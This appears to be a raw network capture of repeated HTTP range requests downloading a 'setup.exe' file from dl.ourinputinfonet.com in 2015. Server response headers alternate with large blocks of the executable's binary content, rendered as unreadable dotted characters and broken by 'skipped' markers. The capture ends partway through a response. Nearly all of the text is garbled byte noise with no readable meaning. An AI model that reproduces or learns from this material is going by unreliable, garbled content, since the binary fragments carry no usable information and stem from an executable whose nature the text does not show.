M.2.}[email protected]!{x.n.....pi.....E#l
.IH........P..0....^z.T@Zs........%.rC..wt..........'...r.> ..[..~K
A..... ..B..:0.v....X.Ax.f....(b.b.aq=.]...1&o9P......2 ;.7S#.O.:..Y..
%Nh^<.~QP..d.......jq............x!.>...8.y..#w.q....%.}..< .
..w.i.....2R.......?\.....D....v.i....O.U~v.#-.E0.:.....e..vn.g.4.~...
!S...[..........x...L6g...p*.Ce.5$c.~...0..y..v...EUB...D.%P;..b.x<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=768

Content-Length: 250000

Content-Range: bytes 1500000-1749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694599.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
.......m$..k..k>.g...4....|g8...........".....]........i,.R.{3I:x..
 .Hn..r./........*2.`.?e.x.P..$.'..q.....%0i.t..=...Z.....G.....i.O...
....Y...p..#K..j.....Z...9Z..hh....e..Y........%.2R .l.\.......].0.=.s
C..5X..d...I.7.\s[TQ_.L..v....#{.H....YL......_.DG?..~$..12...>.'..
..)...V........,_..O....."....".4...-..].`..l.....i{....b....7v.9.,B.C
.......vvB...qFO.......u....f'.;\..L.......#.....@[email protected].....
..9.......\6j...d_......'Z..';`..w....5..<.T.....n.E.>O.;H.-a...
..uI&1.iZ.S;L'.OW..z...'.G..y.....J/..Z=.=.p.o.t..x.G...fa..0...2.d...
.....M8.1b9oOF.c..0....U...m.`..mX.F...5M.J.X..)..y..?.r....3Pa...dB.:
...#....p.....6.......T..H;..'......(..%..6.....Q.....<...}FbB.W..k
.u...v......WcFW..qT>).)<...zV.(...J..........<.4...O.~. 4..]
...\*..........i,aX...u....V..RQ~.'....1^..>W.d.`.3...::.H.(.E.v<
;..i!J..X....F....<.5....(..$...vC.dKU.Id.c8....t}/<`.x........,
..<..a\.)..k...p7..C^..B'.#/._E.Y.bq...E=.C['....{~.....Dl9h.....0.
.._..I(.\M{....dXl....W,A........d.....E(\.>.)m.W \.....6^...."z.L.
.p(r..../........U.. ...M...n..8..>...?.B.];W...EC..E.l... ........
.^....VM..a1o....!..;/....g.:....:..v..(.,....c..;u..s\.S...'.z.6]....
...2.a...........^....C.....D"C:...A.^.L.k...S...`^9$.%...[.@>.aX%h
O../\y...i..%f....!..\.W_..-.X&.....a...?.W..-...............E.N&U.w./
.2..S...2.......V.O...ga.[../.!.....=..i..;.7y..Yjc^.<..^...xq.....
.J....<...^..!....m..8......S.....i........o.P.Z.U. ..(....o.....s.
..`a`.w.r'YO..r.........bl......\.d....0n..h.....~z...........><<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=768

Content-Length: 250000

Content-Range: bytes 1750000-1999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694599.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
..;X^P_...........d.*...e8...>..Z....].pE....._...........a.Z.'B...
"..:Q....?..F.[T...=.....O...E.,.......x7m?...$.....<$......F6...u.
....t*p...m...2}.o*.`>g{..v~~..$8.*.....Q....s.h..>..;.Z...AT94~
..>..@!lDu.R.&....l.^.J...1....:..W.\..hJ....._...;...k...mo2#...K.
..P. &..P......{.W..r.....V....;..'.I......['..wh@[email protected].~.T.u4J:S.#.
...O.....$fl]...t#..UN..m...u?."...B.<.d..,..?F....N.....c.y)2....$
.........D).f..&...u....S.....9.......wc!...\d........4S...AT......_.T
U. ..pk..;,...^.~..`...$.3......@9V..}v......./....i._..|wC./..b..)u(.
.~..W463.....1.OQ....LN...h.k..q.{.hp.\.K..Mq.|.ye-...B.O.X..-E..0....
&.(ve....b..k..8....2.z.{P....-..o....|.... "e.........En/=t68.a..C.{!
..vC~....Y.s.At..!....@.'..'i...j*."r..%G..."! [email protected]........#N^.&
lt;.......aJ..}s.%.x.<8p>I..8.Ia1.sS ...... .1jD.6..J.Z.L.=$..=.
.....z...YEh.=W.>..\......"..f...7.yS.q9.....z...Q.?...B....r..9aSU
...^.X=.a.bt4..T..$u{k.Z.\9....]..J&....|...(.Ql.D...}n.M.q...t....U..
.m....hp....M..<.dc.Vmx.dV....A....L.j..{-.......S..#..f....s.l....
Q ..:..P>...I.......Kg'4P#O..................o..,.....\.7.t.. ..[z.
...Z#.-{....#{l.v..\H[.^I'....1.......e..Y.OT. 5@...:...,..V.}...3...T
..dB..^.(.J..*.p`.!....w...........1....g...#..kL!...........E...1E.j.
 [email protected]{.^.....-L...n[E.f.....B..@...}.].l..
{0;... .x...u.o.....;....t:.Y...d2.q...xX...W.QI....f...&...@.'...*...
......E.!..<,{*.....o~.0..<.....Q...&5..S....>.C..D.Lx.&...r\
..E.g.. ....;J#...-.`@....uT(.dei....k.....e%|..0..Q...)^..>...<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=768

Content-Length: 250000

Content-Range: bytes 2000000-2249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694599.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
.............>...|F._..:.7>.......S...0.Y.lVm...Gg.N.b.....b....
.N*Q5k..|].f...qh.fe.Zx.......|\.d:^...Jv3.# =...|.a. ..!....FL..3..QK
[email protected]@..fsC..E;F...4...|3h
-b..............&y..Y0>.u.y....$.?%.HQX./..p.....y..>.ga..sd..H.
....b..lY.u.o.N.-{.`.'..s..[.. .~.F...y.$m...UH(.|.V.bQ..[..j...v.rZ.t
.......,.U_.,I..K..Y.X...L6.%...../.$'V....y.l.z.......6T...........\.
.DB.<.E2O=..|.]p...r.......R.C#U_...(o.....b.....)l.3..c.,,/.W.DZ..
O..\.......d..aVA%.D.6.......4.....8..vub.......33..1.......(..k...I.j
]...N..R.y*...rz2...S#H8.G.'.A.l......=ef.U.Yb.g.r..|S.e.X.n....&.....
A.$B....O......Q..S.&.?.$....EM./......O_0@&*.....U....Q......l.R.....
:...l.A=-...]m..^.|..0.....3&.j}.{*.s......<j....2.4.r.`x[A,.~....n
.o.....h...u..K.h........ ....u.>%...o......i....;. ....B.#N.4.@...
>/.j#..d..K.35..g.,.........g>.^...O/%9.=].. 9]g...Ku........D=I
..O...<o.p..~kV.......>.....N.Q...:..dL..5.....i..tY`..~.g.t..8.
..x.=.KJiO.z-........<..k.P.M<.....N.....O............p.3pI."9: 
..... K.F...Q..k.V.j......x..1..k.?^.....C!........0.)eb<..[...^...
.V..0.g.....6,~.b....N.)..-.G*.....]u.}#.V.......nj..}.....].A....m...
.....".0K...N.E....2.`:K....c.\.@....%.cq...).Q"T..v..G.^W.9.=....r*b.
1Q|E4K.a...O.t..........k355%...m[j...W.. ...5D..8.....i.....C...`yW..
.T..M......b.g...rx..!.8K...[h go}s.......p...9...<D..L....K.;'...e
..Y.X...N...WT..............l..5.&.x..j.].X..Rs.'...s............<.
 .y.......w.N<..$. ...u...P.u.........^...m.@/.1)..V..........;<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=768

Content-Length: 250000

Content-Range: bytes 2250000-2499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694599.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
.pP..[..2v.j....w^\b.......3....}.&.z...gG7{.T.=p.?.....=.%.9..]....m.
..q.S{......ouw<.Z.H.....3.C.W..x..gj...efFH..1#.i.8.)Z.jK.HC....5_
.P..(..<!.K..,...@..:.V..........H.l.....B....7.{...K..."....,B....
CX....Uu.m.N...NQ`...E....g.k..._.y.R5....`...W.QH0'}J^0#MC....J......
... .xf3.5.0...0...}...7Hr/.....6Z..~..4.[.].....W.o. f..l6..8`.ge..:.
?/c....fq....>Ik....'.Wm.v&xm.v.^6.V...|......3...c.Io.......q.....
3u/..m...mq\c..f.....F.y.EWZ....A.....%.:s..F.b......h..h.t...L..V .&.
...wB.J..&.e..6.;A.a....)..*k...^M..E>.....~.&...".....=...z..$...V
.... t[....h...B....T...m.T.;(J..J....B`.T......t..rC.....,6.....s...l
......uB."..4...|B~...1$$e.r..$...j....>v....KP.(..&1.^..~.....r?.(
.{...|S.......U.......V...G....y4-FCFb.z....".g @. .....h..Y.}..*.qbB.
b2.....VY...7r..ljo..L.....H..]....zo.;..u..~.t......;Q[..z.yQ&);UMzm.
.....a{.(.k..%.eR.D'p<0..6..v2. .. \....u......... 6N?1..y..7.`....
.V...._7..,W.a%B.S97..c.sJq....o..*... &>.'..r.)....g9t.. V.o<.)
|.Cv..=..........b.......7.....>...CI.4..! ..$...g.k.6.z&.....@<
........U...7......,..:....h(Q-~.pf.,8.>......X...fI..2.?...&U..n.`
.....a...h..f........~.B.m./.\YR...k.......H..f!...!A.K.UH.V...#C.....
..L..l..[.@*..?N!....**...s...eSqiC.........&z.k...S<..t..D.......W
;.mD...k...{........<!&.`[email protected]%v.p..q."..
..a.q...qs....1E.j{!.. ..:V./.........g.PJ}~..bI..`bE...R........2.t..
...2f...V....U.B..:.kY..%-.*.NY....DF#...q....?....M...(lZ..........sB
Z>...SQk.K.......9......H....gOA......JE7g.N..4a......LAE....9&<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=767

Content-Length: 250000

Content-Range: bytes 2500000-2749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694600.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
.|jd./.O..{#...yz........gu.$<.....Y34<.jo..5Vpz.'rD.=.Z.E..'...
...4.z..p0.D4.R.......D.\&..9zS..=...4(mT......_._P......r.[....d.....
....{.$....]...W....Fb.Z.4...IR..R.U.7..-../...............4vF.~......
.\W(E..Rm......V6.g...~.~P5^. ...N.u'......[o.......1..~.}.Z....f.Z..m
n..4..SnX..[.{...3......zP..dO..k8.[?2.....qF..7.^..s......e".........
....0..........k[.J.~....d.v....mS.....="..bZ..E.".E...V. )`.k........
h.R..ob.x.(O.........Q..\$.A....G....t b...a..............TK..Z.......
.W....%..z.K...#m.kQ.c v..-.8*B.l..S.c....'.oEF.=.|.;....?&.`B........
......S...n.9.2.............f_.Z..\Y.z..kD..$..5.!N.2.t.....5..p......
...S.'.....h=>V...Z}.d92H.b.........g........k.N........3.......-l!
E....6..d.u...'|'...qCtG T.X-x.......))l....B...= ....>.{........H.
..6`..=..g..................c....:.x.....G.:..J...T.J...U.%...j#.. f K
. =Q..s .....86...^[..Qy......N..h..^.....5JP.=..kpdW.,E....Y.FX......
.k....\.;7.h.. :..(..|A.nU*..E?...se...6.W.._..\vw.o..Hd.7m5.O.#.P....
...s..K.=.._K.`...V..."y...mA...@.}.q......C.....L.....{........"|..[.
......W...4Z.........-........i......fX. .....nA\.\.....#7=..p.if...~.
[email protected]./.V[....C}6..|...b .%........h....ZK.7Q4.5N...a.~a...d%.w.
l.34e.u."=O....W.J.[^.S:[email protected]....'.V.J.a.(]..v%.^vU...K.c.U.
R.f....ao.&..J....-r.K..1...;x.BB*..........D..);d.....Z{.....m]'.Y.}Q
.=...[VU..Iq."..tB..G......v........5.).;...N...N$..|-.u.c.i;.f$.Sy...
[.&..g...$.....w..o.h....H.."x.5\..{...*XS.co..Y...N..`..{.h..q[e....,
g...W.y...C..60G%_......K;.....7<..u=..o{......3......B.7:o.;}.<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=767

Content-Length: 250000

Content-Range: bytes 2750000-2999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694600.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
......F....np....N....r.1`...4}..h.p...{9]Lo%$...&Vu.EhZ...M..iW.....&
lt;..z...QX}..U....B.f..z..ohr.....$).. 4r../.B0./l.G.....i^.6...C..D.
...X..E..:.g.....>.J)..6_....L5uzO..@>.d.'^-&5.c..]....K.G.c.&.!
....=%...Q..d.1M. .3C.^.b.D&.x E. ..i...~....O..5e.........i.3..a'..W`
vX=W......$f.dh...|z.&.-.............>}.3m.>....6X...q......<
.L..m..I...$...:.d*.1...!.....a..N..... ...&Wo...`F....3rR<>.kEl
*.....|[email protected]~......uPK$.q...0s........r....y.........y.M..q1.!.'...
o.k1.........8...Y.x.%s&.G4.o....*7..dHhA.v8..X)..........(../....L.*.
.8....<.9.8........E......:w.\aMh;.....r..A.n.hoH..Q,o.RP.. .8...k.
j.^.`..$..e).V..T...=.]u....Qe5.l.....Sw....{.J..)... "H..m..!.m./....
....W....j%..V.h^.....h.;[email protected].]v..g.<[email protected]/.~.I.....(.5
[email protected]@...QdSm].%5....:.d...g...B_...;..
..-..n?..C..Z...,..#.....9B..Y..../....w...5Z\..D.W...9,..lB..........
n.......,.d.f...y.!s..)m...P.>A!.....{.....m..3h...~/K.P...*j.Y...o
...6|..........).j.@...<P.....x.....S.'M.....|...j...$GlS{.B.b.iN..
O..g......49.!..2.]......,.}..../.f..Uy.....1Z...N....7.3r<.. ...8.
.Kr.$........d..1....I6.......cf......}.:...c^..[@../K6H..t......].=..
x......r{....U.e....>..c.g*...0......Z4.6'...s.......<.1D1i_...K
.....t-......4.j..<.t.f...wC.x..>......@.......?JRs..mF..K..(bp.
.I...~...>E...l.H.U..d...D....,..5.k......S^glD{y....A....1.B.w0.c.
x.#....e...*#0....2.M.{......Q....9.D..Y.iE...F.C .K..s...{>p.Yu...
..13..S4X.;.2w..c..#.}.}!D...9[I....T.x.;...l\......$.....}j[.....<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=767

Content-Length: 250000

Content-Range: bytes 3000000-3249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694600.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
.....Zz..<vf...>~...%.\.....h..EY.5..l......;r,.......".4.53..U.
.(.....>df.y.$..8...o *:G.......D!..m...0g...F..ar...wnE....g..e.  
h....t5%...........2t.k........;9 ...... ......%[.Z G.h.W..W..W^......
I.J...6.s.x.._."gL.......s.T..ikR..m6........5`...y.L.....yi}....~C.S.
..Op(.*$..WK..&.V......iU......{.7..n....5..ia...._.D..!4...7H9E.}.q`.
wV.C.]..~.._.Qb...&k.n...2...>..|......{|Xp....l e.e..-|.mu\G.Pl...
...._'...$.>...7.&....=................k...]..._.........mtc..l....
..N...:M.....a^.h.......YU....:M9...B...r....)l...M..T!...!.m....8M...
....}3i.......Y...g...8...T...Pr-J.J7.....Re.y|.K..m. ....x...9P$..t&.
.......'..v..}..T~..[.U*).<.........{.=.52...........W....SlN<..
......R'..Q4.G.e.C...G0.Mm...#.yM.HXr].....A..F.C.i....ecj..j(.'......
..J{j/H......!sZ%h...Cl......b..1=....7?.*.W..>W..y....C>....a.O
.C.s.........!.d.v.p.2ul..K...6.T.E.P..p.4..E.e...dc..X.......'/....d.
.....A....ur xK....s..Ap|-mr...../6......{YQ...m.E..j....W.9..6R.^e...
..aE.{&.......[8'h./...:a.w.Id%`.g.[G......mA.[...[.a...|.[.g....'8.v.
'1....&?E..4O..fF.....l.O........|}........E`>.......Z.3X.*b.`.....
...../n.R &.....5...52,.!(u..3..z/.i..:.f0u..;.e....]..R..J4....a....u
.y....../.....{..V....FF.R.,.....a .g....K....a_..|...H.Q.)Be.B..d:i..
.\.H.D|b:..b..:[email protected]..([email protected]<.I1......I...F.q#.u.%T
...2.K.L...a7.WB=..h..6.U'f .3...2.%E....6......|...1_.v..f....*7.*...
Ri...91.........xxm.t.}...~4..Brk!p.L..6..{...`Jn. ?q=p.S.w...VP.2Zq}.
... {]x..1.'~..N......kZ..^`..(....E.s.....(.....=x..7DR...\.#b...<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=3250000-3499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=767

Content-Length: 250000

Content-Range: bytes 3250000-3499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694600.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
..t.j!....>..^.....q....*n..l......V....,........N./.6|.n.~DY......
.0."'U.if.>^..T~....q.....W.|.R.aL&. hH.$m!..c.....f ..?.s.6Z.`2.-4
1.1HLc.I..u..[.0..A..j2.,.~,m7]P0..L4%...|..(#..roe#)....8...Y~.DO*..&
gt;......m..s.MDa.W.;1....~.meH...%..T.s#....&.k........5n..J..hy.xC..
v5aGc........T..L<({.7........aT..6..u.R|...K.0UF._X..q...{.?...FY.
....&S..9...>Q.........Sd.^[email protected]..|..m...F.t..!7o...%@....`
=z.5..f.-I.....=u...e.^_..8....6...|...........~......>...I3..v....
.)Oc.g..S..&..`  [email protected]#..r.........x0.!.ir.../.]b..~CyW...?........
...%P.^d{..?....Fo.......4.O...#V[..e...B.d.?.SA.0..O.zP7...om...zR.).
>8...F.[._Y.. ......1..U?vZ.uG1C;.G)V~/...N4Fc\I...C....ukI.!.1.'..
...Yi..9../DB.....*.i5.i..yw...c......!..3b..tl:XAx..2;.b.........G...
H..m....u..{-`.uA'.......7.<..S.........U..".......Mt.)e....t...?..
.2[>z..Jf.a..`..<.Avn Z....?..>$..>......s.....^....qU.|.d
..V...B..&.f..hE.(..`7.].h0E02..>9gN...F....1t~....]..LCx..q...x...
K.j...[....?....1..sy..n=.....j...M.n-.c..,^..m..U.4._p....p .'...?...
4....k{Q.....hhg~.n .~...4....&.^Cm..z.Q......_.....aR.Q``..S..B....:.
.._Z.!...e....p.......*#.].....'~Co...j....%..........j.p..K.tG'3.....
B..Y..L.. ...T....W..iJL.Hl......g.`Zw.bY.mh6..k.3........c.n.o....1..
.Z.U[[email protected].%..q...q...w..2.._.bo.%2.k.. .n.3...e.b"MK..{.s........
 .D..E"1QW(E........'.=]..1......8...q.Z.....?3sp....61x....\..IV..X).
..\l...........D\h.....[....v.........f.dT{&.O.......6.... . ....|.P..
0B..^.d..^....sPo...[..a4.UM...:.......f......A.c.......1...}.....<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=3500000-3749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=767

Content-Length: 250000

Content-Range: bytes 3500000-3749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694600.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
.=..z..A&.....A.R...=Y....>....FS..:.[L..&......KrX..;[email protected]
xvi...,.. .5.J...kmj..MyO...g.j...E......pUZ(..z./......a.....E.5.|.Mj
...O.....J.5...J..<....8[r.|.H|....r,fs.P..}.}.6>X-.v rj....|...
..H...a..-....Z...#.O.8.f.w..Y|......v@w.)...H,..Y*.~j!N..X...MQh.....
.g..|!.d{.......}(h.\#.XR|./Ue.Y........,me........>..x.....Rq.?./.
".....b..J.k..s^....o...LCY.UL..p_K.k.a..A/-m..t....W..l.4.GU/..=E.p .
x.....|FD...C......|.....D....yTj.}.. ...z.:.[.dp.mm.M..QJ.|^8.AV.enS.
T............!... [email protected]%.;...I......:...........@=HTMt
.L[......8A<.x.LC..xm.......K.Js{...V.........]".V.d....>.O.....
....rf.Z..o:........w............D...xM.g..m......T..3....mL.T..%".P./
...W..V..N....j.0.%.>.! ...$.\CVBq.!.l%ysT#.=...}..s..N.B.5d....sZ.
Gce,.j..M/g......>..c...J.aC.sW ..i:..c....g.<Y.=.._..F....=.T..
.xbni........EC.P'9r(....bW..h{.v.>Y..z)3..........U..D.......H..[.
..b..v..o..A.U8..........Y.^...t...z.y..D.."..6y..M..\..X..|..Y.......
.tZ.O...z.....J].!^$..#.~...DFb._.*%.Y.@......$...u...X...E,.M.:OCz...
._.s:R^k6........Y..."..G8.....G.....*....e.Id>..5{...].... }Y.r...
..._fo...K......$6$.w.i..........y}..a.J.:..vNXUFR......,`.j#.`D.t...Z
.q:....l.j.....l..Ss.\........F.Y2q.....j....Bmd.VyI...B....V........M
@$e.w....>!sa...... =.....\...kA..4..V......q................s.<
.#0.x..v%8.~.N....u."../..Z...,t....ye A*...6..TY'p..HYl...a.......I..
p..w...-6p.2....Q.... .;.}./.....O....(......_..|B|..TVI..^.....k~....
..n. ".....f.[[..Q[.s..J..Ub>.M..tJdqur......@(.6L..n.w...Q...N<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=3750000-3999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=767

Content-Length: 250000

Content-Range: bytes 3750000-3999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694600.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
S0.gK..........j.!le.R.j..%L.lE#..b.p0UG...[.q..1..h..o..w..z....3C...
i.O..$..JG.E.....Z[.OHA HvSu..XY...6))&.[.'.2..`7..B.g.>....B......
e.....o>..|.}[email protected]*..GL.M."...`...
./f.MA..d.4.......%..}..{..T....5B.._.v:..v.abQSZ...U..9.|.s.^.:.&9...
.&~.4ooEm$....",S...".I%.m.0B...}.YH....].;...FvX.7....Z.3......&...Y.
..EQK.1=q...........0..3..@ ....g..hB@....#U4..).....H.S....r.....*...
.b`..A...w.sP..M.....K........g..\J.....I.Gkb..u^...F..mQ)E..T...r. P.
.s..6C.Ug.=9..7 J..G...`4......TU.ppD...DD.R.b*o.....K...{.....Z..kM..
I...B......{(.~.9@..?A.A....4`....h1z.W...r..<%.[..w.o..D..- <I.
Gf.0.]..... t.u.! ..i..0.n.......b..tZ......~.fn.N..\.G....?..Q-?.....
M^.. ..f~.!..e...v...b..F...!5*u.?l.=.......E.%B#2..3.?..V..r...q.F...
..l.n.)..=.c......eA.........B..........r..#mCWpE....}..:>...@....,
...n......>dJ.f...tQ.4..?....X.-....z.s.m..|.P.$.?Ka...,.<.v.b..
..}.R..].Z.......b..2..w....'#.c30.i/:....#.t..'.]...........s...|.S..
"..?(..Jm./...5-..x....j......._......1<.s=s..nO..*;..........*.1".
E2f.[.~..a..S.1.[...v..v...p..R.....$.2q 7...Tn`......%..IX.......Sa..
.......,.j8.V........j|.......=};....Uq..#....Z..zpp.....x.[;N...1.A..
..#....D7.m....M.....Y.....(. .W.A..'.e...gF...<.......o.h...8.....
.j.[C......C.........:).....0a.K;\..G .. 9o....D..............e.......
A..=j...#h.v.....n.j%n...y...M......J/.." ..../Cj...T.@..[..x....R....
..p.....~.t.....p.......$..&.U...sq.m'h..FF. .h|... ....f>'_k..Y...
..|#.g&X.......5.y.l...W..Hw4E.,.. ..t.y............Q........"~Uz.<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=4000000-4249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=766

Content-Length: 250000

Content-Range: bytes 4000000-4249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694601.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
H....}Sq.a..$.E/..B......Tm'.#.......#.J.%...y...('K.......C[.....o...
...."....1..c9#...3._~.N..a...,.....>.Wf|.)........l.BqHQ..BP..F?..
.`.....:#a#7.my.M....D.)..B....y...b.[-..[..ox1vD.$[...9.7.E.....G;YA4
.J#...h......6.'..x6.ZR..iZ..z..F......w.%....s...2E...B..C97.d.c.....
..........@.*F..\V.....Q.8....b..."&...\..;Ib..ZR.......d.U........V..
.C...P....|....U.`@a.Y. ...n..J`&.=........E.....ik>.`....v.C0...y.
.......~..<...7...g...qV.r.....%.L..9.^;.C%.......1..R}T`(-;.. .ich
A.....S:.....N.D....=..'d..{..[..Fw6g/.. .".M].L.(.}.{.EM.lu.<..\.)
a#..........I.^)........._.}.j,.4a=c.K...q...4q1.....:....>....9..4
R..\Y...JS.iZ.p0.....L..i.).;.............._..i9.gN.a...!/*.m..aG..#.;
Be....'..O..BY.Z..1\c.rZr.............!."...ep[..).4.C....a*.q....gUn.
.uaf...^...G...{...m<.8%([email protected]:.$k..=K.....[...
..F..u........ND7.X.tP3.,./......I.....:.T........O..=.....O.....UA..B
..j.e.Xi.....C...).....1............../.... ...&..e2C.A1..Lv...9...g..
.8......ON.0.D.ZH.5...:..e.f......U.D&....p.......`".D.t/..#....A..pBN
}gV".n..h!.........J...}M........-x.#Z....%.LS.]...^...Kr.[.....=..qu.
....m....0.sU....g...V........XZ...*U.....t)hgs....HZ..,...F.)1ix...O.
.)i...)[K.....C.1p..../....z|...K2K..~'i....e.....NT.... ...V.._1.e..}
[email protected]../[email protected]:a.....V([email protected]...<s.C...4&g
t;...t2w].0D..P....S.mU..4.....#%..l......d...O.m......G..eQx~Z.ln....
.......V.c.\m....N....N..I..f@......_7..h.8fA...d.P..5}.c7p-,.>..?.
..A.K.C[..\v.......^e........>--...-^..iq&=k..*...M..........EK<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=4250000-4499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=766

Content-Length: 250000

Content-Range: bytes 4250000-4499999/10834868

Content-Type: application/x-msdownload

